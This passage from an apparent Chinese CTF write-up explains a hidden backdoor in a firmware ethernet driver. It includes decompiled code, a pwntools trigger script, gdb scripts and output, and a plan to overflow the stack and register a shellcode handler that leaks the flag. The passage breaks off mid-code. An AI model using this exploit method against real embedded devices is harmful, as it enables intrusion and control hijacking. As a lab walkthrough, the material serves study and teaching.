class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> __fastcall <span class="title">smc911x_emac_rx_backdoor</span><span class="params">(<span class="type">int</span> a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> *v1; <span class="comment">// r4</span></span><br><span class="line">  <span class="type">char</span> v4[<span class="number">64</span>]; <span class="comment">// [sp+Ch] [bp-70h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v5[<span class="number">2</span>]; <span class="comment">// [sp+4Ch] [bp-30h] BYREF</span></span><br><span class="line">  <span class="type">int</span> *v6; <span class="comment">// [sp+54h] [bp-28h]</span></span><br><span class="line">  <span class="type">int</span> pktlen; <span class="comment">// [sp+58h] [bp-24h]</span></span><br><span class="line">  <span class="type">int</span> status; <span class="comment">// [sp+5Ch] [bp-20h]</span></span><br><span class="line">  <span class="type">int</span> v9; <span class="comment">// [sp+60h] [bp-1Ch]</span></span><br><span class="line">  <span class="type">int</span> *data; <span class="comment">// [sp+64h] [bp-18h]</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> v11; <span class="comment">// [sp+68h] [bp-14h]</span></span><br><span class="line">  <span class="type">int</span> v12; <span class="comment">// [sp+6Ch] [bp-10h]</span></span><br><span class="line"></span><br><span class="line">  v12 = <span class="number">0</span>;</span><br><span class="line">  v9 = a1;</span><br><span class="line">  <span class="keyword">if</span> ( !a1 )</span><br><span class="line">    <span class="built_in">rt_assert_handler</span>(byte_600704AC, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">unsigned</span> __int8)((<span class="type">unsigned</span> <span class="type">int</span>)<span class="built_in">smc911x_reg_read</span>(v9, <span class="number">124</span>) &gt;&gt; <span class="number">16</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    status = <span class="built_in">smc911x_reg_read</span>(v9, <span class="number">64</span>);</span><br><span class="line">    pktlen = <span class="built_in">HIWORD</span>(status) &amp; <span class="number">0x3FFF</span>;</span><br><span class="line">    <span class="built_in">smc911x_reg_write</span>(v9, <span class="number">0x6C</span>, <span class="number">0</span>);</span><br><span class="line">    v11 = (<span class="type">unsigned</span> <span class="type">int</span>)(pktlen + <span class="number">3</span>) &gt;&gt; <span class="number">2</span>;</span><br><span class="line">    v12 = <span class="built_in">pbuf_alloc</span>(<span class="number">0</span>, <span class="number">4</span> * v11, <span class="number">0x280u</span>);</span><br><span class="line">    <span class="keyword">if</span> ( v12 )</span><br><span class="line">    &#123;</span><br><span class="line">      data = *(<span class="type">int</span> **)(v12 + <span class="number">4</span>);</span><br><span class="line">      <span class="keyword">while</span> ( v11-- )</span><br><span class="line">      &#123;</span><br><span class="line">        v1 = data++;</span><br><span class="line">        *v1 = <span class="built_in">smc911x_reg_read</span>(v9, <span class="number">0</span>);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( (status &amp; <span class="number">0x8000</span>) != <span class="number">0</span> )</span><br><span class="line">      <span class="built_in">rt_kprintf</span>(<span class="string">&quot;EMAC: dropped bad packet. Status: 0x%08x\n&quot;</span>, status);</span><br><span class="line">    v5[<span class="number">0</span>] = dword_<span class="number">60079E78</span> + <span class="number">0x16D6DD4</span>;         <span class="comment">// backdoor</span></span><br><span class="line">    v5[<span class="number">1</span>] = dword_<span class="number">60079E7</span>C + <span class="number">0xC25FBB</span>;</span><br><span class="line">    v6 = v5;</span><br><span class="line">    <span class="keyword">if</span> ( pktlen == (<span class="type">unsigned</span> __int8)(dword_<span class="number">60079E78</span> - <span class="number">0x2C</span>) )<span class="comment">// 0x62</span></span><br><span class="line">    &#123;</span><br><span class="line">      backdoor_time = <span class="built_in">time</span>(<span class="number">0</span>);</span><br><span class="line">      backdoor_cnt = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> ( pktlen == *((<span class="type">unsigned</span> __int8 *)v6 + backdoor_cnt) &amp;&amp; <span class="built_in">time</span>(<span class="number">0</span>) - backdoor_time &lt;= <span class="number">4</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      ++backdoor_cnt;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( backdoor_cnt == <span class="number">8</span> &amp;&amp; pktlen == <span class="number">0x202</span> &amp;&amp; v12 )</span><br><span class="line">      <span class="built_in">diy_memcpy</span>((<span class="type">int</span>)v4, *(_DWORD *)(v12 + <span class="number">4</span>), pktlen);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> v12;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而这是该函数的源码（注意函数版本不同，会带来一些差异）：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* reception packet. */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pbuf</span> *<span class="built_in">smc911x_emac_rx</span>(<span class="type">rt_device_t</span> dev)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pbuf</span> *p = RT_NULL;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_device_smc911x</span> *emac;</span><br><span class="line"></span><br><span class="line">    emac = <span class="built_in">SMC911X_EMAC_DEVICE</span>(dev);</span><br><span class="line">    <span class="built_in">RT_ASSERT</span>(emac != RT_NULL);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* take the emac buffer to the pbuf */</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">LAN9118_RX_FIFO_INF_RXSUSED</span>(<span class="built_in">smc911x_reg_read</span>(emac, LAN9118_RX_FIFO_INF)))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">uint32_t</span> status;</span><br><span class="line">        <span class="type">uint32_t</span> pktlen, tmplen;</span><br><span class="line"></span><br><span class="line">        status = <span class="built_in">smc911x_reg_read</span>(emac, LAN9118_RXSFIFOP);</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* get frame length */</span></span><br><span class="line">        pktlen = (status &amp; LAN9118_RX_STS_PKT_LEN) &gt;&gt; <span class="number">16</span>;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">smc911x_reg_write</span>(emac, LAN9118_RX_CFG, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">        tmplen = (pktlen + <span class="number">3</span>) / <span class="number">4</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* allocate pbuf */</span></span><br><span class="line">        p = <span class="built_in">pbuf_alloc</span>(PBUF_RAW, tmplen * <span class="number">4</span>, PBUF_RAM);</span><br><span class="line">        <span class="keyword">if</span> (p)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="type">uint32_t</span> *data = (<span class="type">uint32_t</span> *)p-&gt;payload;</span><br><span class="line">            <span class="keyword">while</span> (tmplen--)</span><br><span class="line">            &#123;</span><br><span class="line">                *data++ = <span class="built_in">smc911x_reg_read</span>(emac, LAN9118_RXDFIFOP);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (status &amp; LAN9118_RXS_ES)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">rt_kprintf</span>(DRIVERNAME <span class="string">&quot;: dropped bad packet. Status: 0x%08x\n&quot;</span>, status);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> p;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>对照可以得出，backdoor 触发条件如下：</p><ul><li>发送 <strong>8个</strong> payload 数据包，其<strong>长度</strong>与某个特定数组中的对应 uchar 型数据（即 <code>backdoor</code> 字符串）相等</li><li>整个触发 backdoor 的时间必须在 5s 内完成</li><li>当 backdoor 计数器为 8 且下一个发送的那个 payload 数据包长度为 0x202</li></ul><p>这样就可以触发一个<strong>向 0x64 大小的数组覆写 0x202 大小数据</strong>的缓冲区溢出漏洞。</p><p>由于该题没有 NX、PIE、ASLR 等保护，因此我们可以通过缓冲区溢出来劫持控制流，执行我们的 shellcode，然后<strong>一定要在 shellcode 执行完成后恢复函数的栈数据等，并跳转回之前的函数</strong>。</p><blockquote><p>实时操作系统没有内核的概念，因此如果运行时环境被破坏，控制流无法继续执行，则整个操作系统将<strong>立即重启/终止</strong>，无法继续执行。</p></blockquote><p>这里，我们需要精心设计 shellcode，这里列出两种解法：</p><ul><li><p>手动注册一个 action/backdoor 对应的<strong>事件处理例程</strong>和<strong>路由</strong>，将传入的 flag 直接复制至别的文件数据（例如 <code>/path/to/file1</code>）中，这样当 health checker 将 flag 传给 <code>action/backdoor</code> 时，我们便可以通过访问 <code>/path/to/file1</code> 直接获取到 flag。</p></li><li><p>patch 掉错误界面的显示，使其一直显示 <code>&#123;&quot;status&quot; : &quot;success&quot;&#125;</code> 和返回 HTTP200 状态码。之后 patch 错误界面显示相关的代码，使其引用存在题目内存中的 flag，这样当我们下一次访问错误界面时，即可读取到内存中的 flag 并将其返回给网页前端。</p></li></ul><h2 id="六、漏洞利用">六、漏洞利用</h2><h3 id="a-触发-backdoor">a. 触发 backdoor</h3><p>这里选择第一种方法（挑战一下），手动注册 action/backdoor 的事件处理例程和路由。</p><p>通过动态调试得知：</p><ul><li><strong>数据包的 metadata 长度为 0x3a</strong>，因此我们在发送数据时需要减去该长度。</li><li>发送数据包时，<strong>一定要间隔发送</strong>。否则多个数据包可能会因为网络问题<strong>乱序到达</strong>，无法通过 backdoor check。</li><li>程序可能会多次接受其它<strong>不来自于攻击者</strong>的数据包（长度0x3e左右，来源未知），因此在调试时需要过滤掉这种情况。</li></ul><p>根据上面的分析，我们可以编写出以下的代码来触发漏洞：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(</span><br><span class="line">    os=<span class="string">&#x27;linux&#x27;</span>,</span><br><span class="line">    arch=<span class="string">&#x27;arm&#x27;</span>,</span><br><span class="line">    bits=<span class="number">32</span>,</span><br><span class="line">    encoding=<span class="string">&#x27;latin&#x27;</span>,</span><br><span class="line">    log_level=<span class="string">&quot;debug&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">send_packet</span>(<span class="params">packet_len, data=<span class="string">b&#x27;&#x27;</span></span>):</span><br><span class="line">    p = remote(<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">5555</span>)</span><br><span class="line">    remain_len = packet_len - <span class="built_in">len</span>(data)</span><br><span class="line">    <span class="keyword">assert</span> remain_len &gt;= <span class="number">0</span></span><br><span class="line">    p.send(data + <span class="string">b&quot;_&quot;</span> * remain_len)</span><br><span class="line">    p.close()</span><br><span class="line">    time.sleep(<span class="number">0.2</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>: </span><br><span class="line">    <span class="keyword">for</span> ch <span class="keyword">in</span> <span class="string">&quot;backdoor&quot;</span>: <span class="comment"># \x62 \x61 \x63 \x6b \x64 \x6f \x6f \x72</span></span><br><span class="line">        send_packet(<span class="built_in">ord</span>(ch) - <span class="number">0x3a</span>)</span><br><span class="line">    send_packet(<span class="number">0x202</span> - <span class="number">0x3a</span>)</span><br></pre></td></tr></table></figure><p>还记得漏洞触发必须在 4s 内完成，因此编写了该 gdb script 辅助调试：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">target remote localhost:1234</span><br><span class="line">b *0x6001b1b4</span><br><span class="line">commands</span><br><span class="line">    <span class="keyword">if</span> <span class="variable">$r3</span> &gt; 0x60</span><br><span class="line">        <span class="built_in">printf</span> <span class="string">&quot;packet len = 0x%x\n&quot;</span>, <span class="variable">$r3</span></span><br><span class="line">    end</span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x6001B1BC</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;backdoor_cnt = 0\n&quot;</span></span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x6001B250</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;backdoor_cnt = %d\n&quot;</span>, <span class="variable">$r2</span></span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x6001B298</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;backdoor_memcpy called\n&quot;</span></span><br><span class="line">    tb *0x6001b2a8</span><br><span class="line">    <span class="comment"># continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x600101E4</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;submit handler called\n&quot;</span></span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;Webs* wp = 0x%x\n&quot;</span>, <span class="variable">$r0</span></span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">b* 0x60010208</span><br><span class="line">commands</span><br><span class="line">    <span class="built_in">printf</span> <span class="string">&quot;submit handler websGetVar called\n&quot;</span></span><br><span class="line">    <span class="built_in">continue</span></span><br><span class="line">end</span><br><span class="line"></span><br><span class="line"><span class="comment"># b* 0x60d9c5e8     shellcode ret</span></span><br><span class="line"><span class="comment"># b* 0x60d9c5ec     handler address</span></span><br><span class="line"></span><br><span class="line">c</span><br></pre></td></tr></table></figure><p>执行效果如下，可以看到成功栈溢出：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x62</span><br><span class="line"></span><br><span class="line">Breakpoint 2, 0x6001b1bc <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 1</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x61</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 2</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x63</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 3</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x6b</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 4</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x64</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 5</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x6f</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 6</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x6f</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 7</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x72</span><br><span class="line"></span><br><span class="line">Breakpoint 3, 0x6001b238 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_cnt = 8</span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">Breakpoint 1, 0x6001b1b4 <span class="keyword">in</span> ?? ()</span><br><span class="line">packet len = 0x202</span><br><span class="line"></span><br><span class="line">Breakpoint 4, 0x6001b298 <span class="keyword">in</span> ?? ()</span><br><span class="line">backdoor_memcpy called</span><br></pre></td></tr></table></figure><p>并将机器打崩：</p><p><img src="/2022/01/rwctf2022_flag/image-20220129164005728.png" alt="image-20220129164005728"></p><blockquote><p>打崩后，先按下 <code>ctrl + a</code>，松手再按下 <code>x</code> 以关闭 QEMU 。</p></blockquote><p>重新调试回到栈溢出的函数调用位置。注意<strong>调用函数时，函数传参分别是 R0、R1、R2</strong>。</p><h3 id="b-栈溢出与-shellcode-上传">b. 栈溢出与 shellcode 上传</h3><p>之后我们需要将当前栈上的数据 dump 下来，并在栈溢出时完整的覆盖回去，保证栈数据的完整性。因为覆盖长度为 0x202，一定会覆盖到下面的栈帧，因此务必恢复，否则可能会导致 crash。</p><p><img src="/2022/01/rwctf2022_flag/image-20220129172718822.png" alt="image-20220129172718822"></p><p>需要注意的是，栈溢出能给自己写 shellcode 的空间很有限，只有大约 0x20，因此我们必须用其他方式来上传自己的 shellcode，然后在栈溢出这里只修改返回值来达到跳转执行的目的。</p><p>而上传 shellcode 可以用之前 GoAHead 扩展的 submit 方法，动态调试可以得知存放 submit message 的内存地址。</p><p>但是，栈溢出跳转时，跳转的 shellcode 地址<strong>不是</strong>这个 v4，因为当栈溢出时，v4 这块内存已经被覆写了：</p><p><img src="/2022/01/rwctf2022_flag/image-20220129215935617.png" alt="image-20220129215935617"></p><p>那该如何获取到 shellcode 的地址呢？我们可以在 shellcode 前增加一些字符串，例如 “ShellcodeHeader”，然后使用 gdb 命令 <strong>find</strong> 全局搜索内存来找到 shellcode 地址：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">find 0x60000000, +0x4000000, <span class="string">&#x27;S&#x27;</span>,<span class="string">&#x27;h&#x27;</span>,<span class="string">&#x27;e&#x27;</span>,<span class="string">&#x27;l&#x27;</span>,<span class="string">&#x27;l&#x27;</span>,<span class="string">&#x27;c&#x27;</span>,<span class="string">&#x27;o&#x27;</span>,<span class="string">&#x27;d&#x27;</span>,<span class="string">&#x27;e&#x27;</span></span><br><span class="line"><span class="comment"># 不使用 find xxx, +xxx, &quot;Shellcode&quot; 是因为这会匹配末尾的 \0</span></span><br></pre></td></tr></table></figure><p>查询结果如下。注意下面的 shellcode 被 URL 转码了（这就是另外的问题了）：</p><p><img src="/2022/01/rwctf2022_flag/image-20220130164148119.png" alt="image-20220130164148119"></p><blockquote><p>或者逆向 <code>websSetSessionVar</code> 函数，找到复制出的字符串地址也是可以的。</p></blockquote><p>还有一点，将 shellcode 进行 submit 操作之前，<strong>一定要对当前会话进行 login 操作</strong>，否则内存中将无法搜索到 shellcode。</p><h3 id="c-shellcode-的作用">c. shellcode 的作用</h3><p>shellcode 要做的事情主要有两件：</p><ul><li><p>执行 <code>websDefineAction(&quot;backdoor&quot;, backdoor_handler)</code>注册处理例程。其中 ：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">websDefineAction address: 0x6004D28C</span><br></pre></td></tr></table></figure><p>“backdoor” 字符串无需持久化，因为该字符串会在执行 <code>websDefineAction</code> 时被<strong>拷贝</strong>进哈希表中。</p><p>但 backdoor_handler 需要持久化，因此务必将其拷贝至一个稳定的地方（例如文件系统中，这里我选择将 handler shellcode 复制进 <code>/login_err.html</code> + 0x200 的位置，即 0x606D3aD0）</p><p>backdoor handler 需要做的事情有几件：</p><ul><li><p>将 checker 可能传入的 flag 复制至 404 界面。</p></li><li><p>返回一个 <strong>200 {“status”:“success”}</strong> 界面</p></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">backdoor_handler</span><span class="params">(Webs *wp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* key = <span class="string">&quot;flag&quot;</span>;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* page = <span class="string">&quot;&#123;\&quot;status\&quot; : \&quot;success\&quot;&#125;&quot;</span></span><br><span class="line">    <span class="comment">// 给第三个参数传参 key 是为了避免在找不到值的情况下返回 NULL，便于编写 